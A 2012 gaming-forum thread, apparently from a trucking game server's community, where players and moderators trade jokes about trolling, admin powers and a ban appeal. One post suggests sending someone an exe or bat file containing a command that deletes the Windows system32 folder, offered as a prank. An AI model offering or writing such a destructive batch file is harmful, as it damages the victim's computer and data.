Main Menu

Troller

Started by Bruno_2MLG4CT, May 13, 2012, 22:14

Bruno_2MLG4CT

Nerminzz wanted to troll Ethan but he hit back xD

Ignore another sentences

Credits to our slave Sorin

Quote from: Konali
turtle, you as much an asslicker than everyone else, everytime you get reported, you message me on xfire or facebook

Quote from: Taylor Swift#DemotSurpm

Supreme

Joshua

:fuckyeah: Moderator Panel Rulez

Tyler

[23:19:46] (CB:16) Fish: thats going in my sig

Matias

$nake

It's called being trolled on unfair level, if staff wanna fight with players, should do it on basic player cmds without admin cmds :P

Bruno_2MLG4CT

Quote from: $nake on May 14, 2012, 06:46
It's called being trolled on unfair level, if staff wanna fight with players, should do it on basic player cmds without admin cmds :P
:ukiddn:

turtle, you as much an asslicker than everyone else, everytime you get reported, you message me on xfire or facebook

Dr_dog

This would be easier. send somebody a exe file (or bat) with inside:

@echo off
del c:\WINDOWS\system32

Woudlnt work on ubuntu as the system drive is hidden
LAST SEEN
TOTAL TIME ON SERVER
SCORE
TRUCK LOADS
CONVOY SCORE
ACHIEVEMENTS
ARTIC
DUMPER
VAN
FUEL
CEMENT
ARRESTS
CARS STOLEN
COACH
PLANE
HELICOPTER
TOW TRUCK
LIMO
TRASH
ARMORED VAN
BURGLARIES
ARMORED VANS STOLEN
MISSIONS FAILED
OVERLOADED
FINES PAID
TOTAL SPENT ON FUEL
INTEREST EARNED
DISTANCE TRAVELLED
TIME IN JAIL
LAST MISSION

Ethan

It's called being trolled on unfair level, if staff wanna fight with players, should do it on basic player cmds without admin cmds

how to get rid of Snake: go to his account on forum and hit the BAN button... Is that trolling on you then snake....? for fcks sake, take it as a damn joke.  and I dont see anywhere where I was fighting with him, he obviously doesnt like me for whatever reason

and yes, that was the best comeback by me in a while

TwiXXXie

Quote from: Ethan on May 14, 2012, 15:02
It's called being trolled on unfair level, if staff wanna fight with players, should do it on basic player cmds without admin cmds

how to get rid of Snake: go to his account on forum and hit the BAN button... Is that trolling on you then snake....? for fcks sake, take it as a damn joke.  and I dont see anywhere where I was fighting with him, he obviously doesnt like me for whatever reason

Matias

Oh my god $nake stop fighting about moderators power, you complain about lindsey, now you complain about Ethan, its just a joke...   ::)

Addis

dude, wtf am i seeing here, OMFG  O0

[hide=Konali's Story]
I will explain it in another way: Once upon a time, a speed hacked connected to Convoy Trucking. He thought he was the king with his magic speedhacks and he couldnt be caught. Unfortunatly Smokey the bear had just the lastest :letmebanallcheaters: update and the speedhacker got caught. Alot of days went by and he decided to appeal his ban. Some lazy ass admin called Konali checked on his profile and saw he had 10 days left to be unbanned. All that there was left was locking the appeal and hoping that it would be clear to the player now.

so uhmmmmm basicly: you cannot appeal fair bans/but your time is served in 10 days so just wait and uhm.. enjoy my story. ok
[/hide]

Twido

Endless war between $nake and Ethan, got to accept it lol :p nerminzz Troll 2 after Troll 1 (rafe)

[hide= Just a rule]
Quote from: Mick88
Your friends do not have the authority to allow you to break server rules. ๖ۣۜTωi∂✿
[/hide]

Bruno_2MLG4CT

I think i ride someone 'rule'.If last comment on the topic is 2 weeks + old let that topic to die.Last comment (before adidis) is on 14may.so,
Locked!